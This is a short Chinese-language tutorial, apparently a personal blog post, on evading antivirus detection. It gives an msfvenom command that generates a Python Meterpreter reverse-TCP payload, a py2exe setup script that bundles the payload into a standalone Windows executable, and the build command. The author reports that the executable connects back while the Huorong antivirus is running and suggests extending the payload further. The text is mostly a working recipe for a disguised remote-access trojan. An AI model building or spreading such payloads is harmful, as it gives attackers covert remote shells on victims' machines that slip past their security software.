前言
经测试,基于python的免杀工具,只是能起到一个反弹shell的功能,当然拿到shell了,其实也就足够了。
准备
利用msfvenom生成马
msfvenom -p python/meterpreter/reverse_tcp LHOST=监听IP LPORT=监听端口 -f raw -o hackergu.py
准备python脚本
from distutils.core import setup import py2exe setup( name = 'Meter', description = 'Python-based App', version = '1.0', console=['hackergu.py'], options = {'py2exe': {'bundle_files': 1,'packages':'ctypes','includes': 'base64,sys,socket,struct,time,code,platform,getpass,shutil',}}, zipfile = None, )
运行脚本
python2 setup.py py2exe
生成一个exe文件
在开启火绒情况下,成功上线
后续
这里将其命令框写入内存运行完全是ok的,但是我没有再多去研究,可以扩展生成的payload,使其发挥更大的效果。